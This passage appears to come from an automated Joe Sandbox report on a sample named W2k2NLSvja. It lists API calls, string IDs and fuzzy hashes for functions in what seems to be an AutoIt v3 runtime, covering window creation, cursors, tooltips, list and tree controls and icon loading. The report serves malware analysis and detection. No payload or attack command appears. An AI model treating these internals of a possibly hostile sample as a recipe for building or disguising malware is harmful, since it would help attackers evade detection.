                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                        • API String ID: 699586101-1459072770
                                                                                                                        • Opcode ID: f6a3937820386adad6676b465ec56ccb5b0ad35138ae36e0eabb195e06319ead
                                                                                                                        • Instruction ID: 075fe66ce30c0d0f57f89552bab294ecb5ac75395756a593242377cd302a7422
                                                                                                                        • Opcode Fuzzy Hash: f6a3937820386adad6676b465ec56ccb5b0ad35138ae36e0eabb195e06319ead
                                                                                                                        • Instruction Fuzzy Hash: 19410AB2A04241BBE711A7659C43EBF776CEF43710F00405DF944E6142EB79AA4176B5
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828BC
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00F828C4
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828EF
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00F828F7
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F8291C
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F82939
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F82949
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F8297C
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F82990
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00F829AE
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F829CA
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F829D5
                                                                                                                          • Part of subcall function 00F82344: GetCursorPos.USER32(?), ref: 00F82357
                                                                                                                          • Part of subcall function 00F82344: ScreenToClient.USER32(010467B0,?), ref: 00F82374
                                                                                                                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000001), ref: 00F82399
                                                                                                                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00F81256), ref: 00F829FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                        • Opcode ID: 1a4aa0c63c30c319081a464abe1ea1032639a79ee815d22de5890613234fecf7
                                                                                                                        • Instruction ID: 7797bd188dc6ad0b7eceb440cb863445d29a210bf2310d99fed3b5f36a52a26b
                                                                                                                        • Opcode Fuzzy Hash: 1a4aa0c63c30c319081a464abe1ea1032639a79ee815d22de5890613234fecf7
                                                                                                                        • Instruction Fuzzy Hash: 4EB181B1A0020A9FDB25DF68DC85BEE7BB4FB08711F104229FA55D7284DB79A841EF50
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 010040F6
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010041B6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                        • Opcode ID: 8a6747c6b6ef834df94cd49f8459b9ac34ffeec0fe85bfeaeca79c1db50e923b
                                                                                                                        • Instruction ID: c1068f5d962173acfef5e0bea57dce615761470a53efb01e8ce35f2f246dcc76
                                                                                                                        • Opcode Fuzzy Hash: 8a6747c6b6ef834df94cd49f8459b9ac34ffeec0fe85bfeaeca79c1db50e923b
                                                                                                                        • Instruction Fuzzy Hash: E8A19C702182029BDB14EF24CC81AAAB7E5BF85314F088958B9D69B3D2DF79E805DB41
                                                                                                                        APIs
                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00FF5309
                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00FF5314
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FF531F
                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00FF532A
                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00FF5335
                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00FF5340
                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00FF534B
                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00FF5356
                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00FF5361
                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00FF536C
                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00FF5377
                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00FF5382
                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00FF538D
                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00FF5398
                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00FF53A3
                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00FF53AE
                                                                                                                        • GetCursorInfo.USER32(?), ref: 00FF53BE
                                                                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00FF53E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215588206-0
                                                                                                                        • Opcode ID: a86da5b3488aa1359f7ea7a1645d973de54e94393e1635c94cb968d41028f4f4
                                                                                                                        • Instruction ID: e34b457c90c4f029e064f6472000665e18b9606d710584e1432b715e3e27dfdb
                                                                                                                        • Opcode Fuzzy Hash: a86da5b3488aa1359f7ea7a1645d973de54e94393e1635c94cb968d41028f4f4
                                                                                                                        • Instruction Fuzzy Hash: 2C416770E043196ADB109FB68C4996EFFF8EF51B60F10452FE609E7290DAB89401DF51
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDAAA5
                                                                                                                        • __swprintf.LIBCMT ref: 00FDAB46
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDAB59
                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FDABAE
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDABEA
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00FDAC21
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00FDAC73
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FDACA9
                                                                                                                        • GetParent.USER32(?), ref: 00FDACC7
                                                                                                                        • ScreenToClient.USER32(00000000), ref: 00FDACCE
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDAD48
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDAD5C
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00FDAD82
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDAD96
                                                                                                                          • Part of subcall function 00FA386C: _iswctype.LIBCMT ref: 00FA3874
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                        • String ID: %s%u
                                                                                                                        • API String ID: 3744389584-679674701
                                                                                                                        • Opcode ID: 4ecc8b89dbb94f9011abff3c5150dcbdf6818036df98a9e4388e54d0db46226e
                                                                                                                        • Instruction ID: ec78449604c0ea19fe026e9bb9d1d20be132ab66ad174136c151eca15b937e4b
                                                                                                                        • Opcode Fuzzy Hash: 4ecc8b89dbb94f9011abff3c5150dcbdf6818036df98a9e4388e54d0db46226e
                                                                                                                        • Instruction Fuzzy Hash: 4FA1F671604706AFD715DF20C884BAAF7EAFF04325F08461AF999C3250D734E945EB96
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00FDB3DB
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDB3EC
                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FDB414
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00FDB431
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDB44F
                                                                                                                        • _wcsstr.LIBCMT ref: 00FDB460
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB498
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDB4A8
                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FDB4CF
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB518
                                                                                                                        • _wcscmp.LIBCMT ref: 00FDB528
                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00FDB550
                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00FDB5B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                        • Opcode ID: 9ab97df11ff38979d335b9aef7b4feb3bef621a989e588ea4e80b239b72ef36b
                                                                                                                        • Instruction ID: 2c47f070a67f2cb96538ae75a26743d5004471f95ccd4ccc240948aa1cd227c7
                                                                                                                        • Opcode Fuzzy Hash: 9ab97df11ff38979d335b9aef7b4feb3bef621a989e588ea4e80b239b72ef36b
                                                                                                                        • Instruction Fuzzy Hash: 9581D071408205DBDB11DF10D881FAA7BE9FF44724F0C816AFD858A296DB34DD45EB61
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                        • Opcode ID: f4b4379476ca90bba4c787951cf496f10441aefc9a182b739a1259bbfde27ceb
                                                                                                                        • Instruction ID: c89e73fade58e2c4109d7a47b224293a7509359b633d51db92d6d5a0288c1c8e
                                                                                                                        • Opcode Fuzzy Hash: f4b4379476ca90bba4c787951cf496f10441aefc9a182b739a1259bbfde27ceb
                                                                                                                        • Instruction Fuzzy Hash: 5C310332A04305E6CB01FE62CD83FEE77A9AF15B51F64001AB481751D1EFA9AE04F650
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00FDC4D4
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FDC4E6
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00FDC4FD
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC512
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC518
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC528
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC52E
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FDC54F
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FDC569
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FDC572
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00FDC5DD
                                                                                                                        • GetDesktopWindow.USER32 ref: 00FDC5E3
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00FDC5EA
                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FDC636
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FDC643
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FDC668
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FDC693
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3869813825-0
                                                                                                                        • Opcode ID: ca755b196ab6f78dcbc1585d6c5232dff7acfe27c17d776589f314b11875a111
                                                                                                                        • Instruction ID: a24e057d8a342f975edcdcb4c62bf0604a1f76223eb80d3658323c0263781874
                                                                                                                        • Opcode Fuzzy Hash: ca755b196ab6f78dcbc1585d6c5232dff7acfe27c17d776589f314b11875a111
                                                                                                                        • Instruction Fuzzy Hash: 35518F7190070AAFDB31DFA8DD85B6EBBB6FF04704F044519E686A26A0C775A904DB80
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 0100A4C8
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 0100A542
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0100A5BC
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0100A5DE
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A5F1
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0100A613
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 0100A64A
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A663
                                                                                                                        • GetDesktopWindow.USER32 ref: 0100A67C
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0100A683
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0100A69B
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0100A6B3
                                                                                                                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                        • Opcode ID: d0cdebbd653659fd5511bb5caedb62ad7481d192dea2e2029372530534e8c2f1
                                                                                                                        • Instruction ID: e9698f06d41cc78ce8bd357833f238af7ea6845f197937c6cf08ba447bd0e5bf
                                                                                                                        • Opcode Fuzzy Hash: d0cdebbd653659fd5511bb5caedb62ad7481d192dea2e2029372530534e8c2f1
                                                                                                                        • Instruction Fuzzy Hash: 4F7178B1240305AFE722DF28CC49FAA7BE5FB89344F04455CFA8587291D776A942DB21
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0100C917
                                                                                                                          • Part of subcall function 0100ADF1: ClientToScreen.USER32(?,?), ref: 0100AE1A
                                                                                                                          • Part of subcall function 0100ADF1: GetWindowRect.USER32(?,?), ref: 0100AE90
                                                                                                                          • Part of subcall function 0100ADF1: PtInRect.USER32(?,?,0100C304), ref: 0100AEA0
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C980
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0100C98B
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0100C9AE
                                                                                                                        • _wcscat.LIBCMT ref: 0100C9DE
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0100C9F5
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100CA0E
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100CA25
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100CA47
                                                                                                                        • DragFinish.SHELL32(?), ref: 0100CA4E
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0100CB41
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                        • Opcode ID: c082adc8d139e5718b87cace0f703e0841a354b177d44e3bd089993704a46b88
                                                                                                                        • Instruction ID: 4b6d968d119c35a1266b67072aa99047aec157cd7b4ba405fc044e24dbeae666
                                                                                                                        • Opcode Fuzzy Hash: c082adc8d139e5718b87cace0f703e0841a354b177d44e3bd089993704a46b88
                                                                                                                        • Instruction Fuzzy Hash: 11618971108301AFD712EF64CC85D9FBBE8EFC9750F000A1EF592961A1DB759A09DB92
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 010046AB
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010046F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                        • Opcode ID: 0ec41a56a76c92ec99a82bd5b4368540b6f1f573ecc71ead34f244af641b2e29
                                                                                                                        • Instruction ID: c1d4b82e661247c35281140860d3662cde6fe2a588e2e944ad6bae48ab9524a2
                                                                                                                        • Opcode Fuzzy Hash: 0ec41a56a76c92ec99a82bd5b4368540b6f1f573ecc71ead34f244af641b2e29
                                                                                                                        • Instruction Fuzzy Hash: 64917D742083029FDB15EF10C891A6DB7E2BF89314F04485DE9D69B3A2DB78ED0ADB45
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0100BB6E
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01009431), ref: 0100BBCA
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100BC03
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0100BC46
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100BC7D
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0100BC89
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100BC99
                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,01009431), ref: 0100BCA8
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0100BCC5
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0100BCD1
                                                                                                                          • Part of subcall function 00FA313D: __wcsicmp_l.LIBCMT ref: 00FA31C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                        • Opcode ID: 3d3f22951c090730139070427c82dc11301d6e95673d74a56b66f5ebf8c29262
                                                                                                                        • Instruction ID: 2b7273721315e80b5fc3047702e832dba298e8bac3b5db1237dc5a822207f234
